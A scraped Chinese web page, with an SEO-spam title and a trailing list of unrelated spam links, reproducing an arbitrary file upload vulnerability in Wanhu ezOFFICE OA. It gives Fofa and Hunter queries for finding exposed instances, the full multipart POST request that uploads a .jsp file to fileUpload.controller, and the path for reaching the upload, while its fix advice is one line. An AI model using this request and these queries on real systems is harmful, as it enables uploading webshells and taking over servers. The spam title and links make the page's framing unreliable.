当前位置: 首页 > news >正文

广州注册公司自助办理锦州网站seo

广州注册公司自助办理,锦州网站seo,政府网站和政务新媒体建设管理,合肥工大建设监理有限公司网站0x01 产品描述: 万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获…

0x01 产品描述:

        万户OA(Office Automation)是一款企业级协同办公管理软件,旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。

0x02 漏洞描述:

        万户OA-ezOFFICE fileUpload.controller中存在一个 任意文件上传漏洞,通过这个漏洞可以操纵任意文件的写入。这意味着不法分子可以利用这个漏洞来上传任意可执行性文件用于远程系统执行、数据获取、系统接管等,严重威胁系统的安全性

0x03 搜索语句:

Fofa:app="万户ezOFFICE协同管理平台" || app="万户网络-ezOFFICE"

Hunter: app.name="万户 Ezoffice OA"

0x04 漏洞复现:

POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary12345
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--

 上传成功后拼接下列接口进行访问 

http://your-ip:port/defaultroot/upload/html/2024xxxxxxxxxxxxxx.jsp

 

0x05 修复建议:

厂商已发布补丁,请及时修复

http://www.dinnco.com/news/53972.html

相关文章:

  • 百度首页网站推广多少钱一年做一个公司网站大概要多少钱
  • 网站开发一个多少钱软文范文大全
  • 介绍网站开发的意义google seo怎么做
  • 大学网站建设专业深圳纯手工seo
  • 做网站建设科技公司长沙seo优化推荐
  • 做外贸营销网站如何做个网站推广自己产品
  • 怀化建设局网站郑州百度推广公司电话
  • 建站管理后台引流推广平台软件
  • 佛山制作网站设计报价seo排名优化是什么
  • 最近做网站开发有前途没aso关键词排名优化是什么
  • 运城网站建设公司有多少专业排名优化工具
  • java开发企业网站开发文档6seo查询 站长之家
  • 做留言的网站无需下载直接进入的网站的代码
  • 建站软件公司域名被墙查询检测
  • 网站建设公司薪资会员卡营销策划方案
  • 邢台123网站模板网络营销推广优化
  • 广东营销型网站建设多少钱微信广告推广平台
  • 网站建设服务条款优化网站性能监测
  • 重庆网站建设注意事项手机网页链接制作
  • 做我女朋友套路网站it培训机构哪个好一点
  • 外贸公司网站大全uv推广平台
  • 自助网站建设程序佛山seo培训
  • 临沂网站设计制作网推获客平台
  • 网站右侧固定标题怎么做宣传产品的方式
  • 合肥住房和城乡建设部网站seo网络推广排名
  • 罗源做网站的公司sem培训学校
  • 厦门制作公司网站哪家好军事最新消息
  • 衡水网站建设维护桂林seo排名
  • 西安网站建设公司哪家好武汉seo外包平台
  • 建站宝盒做的网站产品推广方案怎么写